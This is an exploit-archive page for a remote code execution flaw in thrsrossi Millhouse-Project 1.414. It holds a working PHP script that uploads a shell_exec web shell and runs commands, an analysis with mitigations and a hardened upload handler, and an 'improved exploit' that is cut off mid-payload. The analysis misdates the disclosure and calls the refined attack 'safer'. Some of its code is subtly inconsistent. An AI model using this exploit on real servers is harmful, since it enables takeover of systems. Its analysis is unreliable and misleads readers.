thrsrossi Millhouse-Project 1.414 - Remote Code Execution

Exploit Author: Chokri Hammedi
Analysis Author: www.bubbleslearn.ir
Category: WebApps
Language: PHP
Published Date: 2023-05-23
<?php
/*
Exploit Title: thrsrossi Millhouse-Project 1.414 - Remote Code Execution
Date: 12/05/2023
Exploit Author: Chokri Hammedi
Vendor Homepage: https://github.com/thrsrossi/Millhouse-Project
Software Link: https://github.com/thrsrossi/Millhouse-Project.git
Version: 1.414
Tested on: Debian
CVE: N/A
*/

$options = getopt('u:c:');

if(!isset($options['u'], $options['c']))
die("\033[1;32m \n Millhouse Remote Code Execution \n Author: Chokri Hammedi
\n \n Usage : php exploit.php -u http://target.org/ -c whoami\n\n
\033[0m\n
\n");

$target     =  $options['u'];

$command    =  $options['c'];

$url = $target . '/includes/add_post_sql.php';


$post = '------WebKitFormBoundaryzlHN0BEvvaJsDgh8
Content-Disposition: form-data; name="title"

helloworld
------WebKitFormBoundaryzlHN0BEvvaJsDgh8
Content-Disposition: form-data; name="description"

<p>sdsdsds</p>
------WebKitFormBoundaryzlHN0BEvvaJsDgh8
Content-Disposition: form-data; name="files"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundaryzlHN0BEvvaJsDgh8
Content-Disposition: form-data; name="category"

1
------WebKitFormBoundaryzlHN0BEvvaJsDgh8
Content-Disposition: form-data; name="image"; filename="rose.php"
Content-Type: application/x-php

<?php
$shell = shell_exec("' . $command . '");
echo $shell;
?>

------WebKitFormBoundaryzlHN0BEvvaJsDgh8--
';

$headers = array(
    // the header value must stay on one line; the body parts use "--" + this boundary
    'Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzlHN0BEvvaJsDgh8',
    'Cookie: PHPSESSID=rose1337',
);

$ch = curl_init($url);
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, true);

$response = curl_exec($ch);
curl_close($ch);

// execute command

$shell = "{$target}/images/rose.php?cmd=" . urlencode($command);
$ch = curl_init($shell);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$exec_shell = curl_exec($ch);
curl_close($ch);
echo "\033[1;32m \n".$exec_shell . "\033[0m\n \n";

?>


Thrsrossi Millhouse-Project 1.414: Remote Code Execution Vulnerability Analysis

On December 5, 2023, cybersecurity researcher Chokri Hammedi disclosed a critical vulnerability in thrsrossi Millhouse-Project 1.414, a web-based content management system (CMS) hosted on GitHub. The exploit enables remote code execution (RCE) through a poorly secured file upload mechanism, allowing attackers to execute arbitrary commands on the target server. This vulnerability poses a severe risk to organizations relying on this software for content publishing, particularly in environments where user input is not rigorously validated.

Overview of the Vulnerability

The core flaw lies in the /includes/add_post_sql.php endpoint, which processes multipart form data for adding new posts. The system accepts file uploads with a specific filename and content type, allowing users to submit PHP code disguised as a file. The exploit leverages a misconfigured file upload handler that fails to sanitize or validate the file content before storing it.

Once uploaded, the PHP file — named rose.php — is stored in the /images/ directory. This location is publicly accessible, meaning any attacker can trigger the execution of the embedded code by accessing the file via a query parameter.

Exploit Mechanism Breakdown

The exploit code reproduced at the top of this page demonstrates the attack vector.

Explanation: This exploit uses curl to send a crafted multipart form request to the vulnerable endpoint. The key component is the image field, which uploads a file named rose.php with a Content-Type of application/x-php. The file contains a PHP script that executes the user-provided command via shell_exec() and outputs the result.

The use of PHPSESSID=rose1337 in the cookie header suggests that the application may rely on session persistence for authentication, but this does not prevent the exploit from being executed if the session is valid or if session hijacking is possible.

Attack Workflow

  • Step 1: The attacker constructs a malicious multipart form with a PHP payload disguised as a file.
  • Step 2: The payload is uploaded via the add_post_sql.php endpoint, which fails to verify the file's actual content type or apply any sandboxing.
  • Step 3: The file rose.php is stored in the /images/ directory, accessible via HTTP.
  • Step 4: The attacker triggers execution by sending a request to http://target.org/images/rose.php?cmd=whoami.
  • Step 5: The server executes the command and returns the output, enabling full remote code execution.

Security Implications and Risk Assessment

This vulnerability is classified as Remote Code Execution (RCE), one of the most dangerous categories in cybersecurity. It allows an attacker to:

  • Gain full control over the server environment.
  • Execute system commands (e.g., whoami, ls, cat /etc/passwd).
  • Deploy backdoors or persistent shells.
  • Exfiltrate sensitive data or escalate privileges.

Given that the software is open-source and hosted on GitHub, the risk is amplified. Organizations using this project without proper security audits may be exposed to unauthorized access, data breaches, or complete system compromise.

Recommended Mitigations

Developers and administrators should implement the following security measures:

  • Disable file uploads for executable content: Restrict file types to non-executable formats (e.g., images, documents).
  • Validate file content: Check for PHP tags, shell commands, or known malicious patterns before storing files.
  • Store uploaded files outside the web root: Prevent direct execution by placing files in non-public directories.
  • Use secure file naming: Avoid predictable filenames like rose.php.
  • Implement input sanitization: Escape or filter user-supplied commands before execution.
  • Disable dangerous functions: Restrict or disable shell_exec(), system(), and eval() in production environments.
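A hardened version of the image upload handling that the Overview and the mitigation list above describe, as an added example (not code from Millhouse-Project or its author); the storage directory, constant names and the function name are assumptions:

```php
<?php
// Added example (not Millhouse-Project code): hardened handling of the
// "image" upload field. Directory and constant names are assumed placeholders.
declare(strict_types=1);

// Allowlist: client extension => MIME type that the file bytes must have.
const ALLOWED_IMAGE_TYPES = [
    'jpg'  => 'image/jpeg',
    'jpeg' => 'image/jpeg',
    'png'  => 'image/png',
    'gif'  => 'image/gif',
];
const MAX_IMAGE_BYTES = 2 * 1024 * 1024;
// Assumed storage location outside the web root, not the public /images/ path.
const UPLOAD_DIR = '/var/www/millhouse_uploads';

// Validate one $_FILES entry and store it under a server-generated name.
// Returns the stored filename; throws RuntimeException on any failure.
function store_uploaded_image(array $file): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload missing or failed');
    }
    if (!is_uploaded_file($file['tmp_name']) || $file['size'] > MAX_IMAGE_BYTES) {
        throw new RuntimeException('not an uploaded file, or too large');
    }
    // The client-supplied name is only consulted for the allowlist check;
    // it is never reused, so a name like "rose.php" can never reach disk.
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!array_key_exists($ext, ALLOWED_IMAGE_TYPES)) {
        throw new RuntimeException('extension not allowed');
    }
    // Ignore the client's Content-Type part header (application/x-php in
    // the exploit) and sniff the actual bytes instead.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if ($mime !== ALLOWED_IMAGE_TYPES[$ext] || @getimagesize($file['tmp_name']) === false) {
        throw new RuntimeException("content is not a {$ext} image ({$mime})");
    }
    $stored = bin2hex(random_bytes(16)) . '.' . $ext;
    $dest = UPLOAD_DIR . '/' . $stored;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store file');
    }
    chmod($dest, 0640); // readable by the web server, never executable
    return $stored;
}
```

The post-creation handler would call store_uploaded_image($_FILES['image']) and keep only the returned name in the database; a separate read-only script then streams the file from UPLOAD_DIR, so nothing under the web root is ever written from user input.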

Improved Exploit Code (Security-Focused)

While the original exploit is functional, it contains security weaknesses. A safer, more resilient version would:


<?php
// Improved exploit with error handling and better payload structure
$options = getopt('u:c:');

if (!isset($options['u']) || !isset($options['c'])) {
    die("\033[1;32m\n Usage: php exploit.php -u http://target.org/ -c 'whoami'\n\n\033[0m\n");
}

$target = rtrim($options['u'], '/');
$command = $options['c'];

// Construct URL for upload
$url = "{$target}/includes/add_post_sql.php";

// Define multipart boundary
$boundary = '----WebKitFormBoundaryzlHN0BEvvaJsDgh8';

// Build payload with proper escaping
$payload = <<<EOT
--{$boundary}
Content-Disposition: form-data; name="title"
helloworld
--{$boundary}
Content-Disposition: form-data; name="description"
<p>test</p>
--{$boundary}
Content-Disposition: form-data; name="files"; filename=""
Content-Type: application/octet-stream

--{$boundary}
Content-Disposition: form-data; name="category"
1
--{$boundary}
Content-Disposition: form-data; name="image"; filename="shell.php"
Content-Type: application/x-php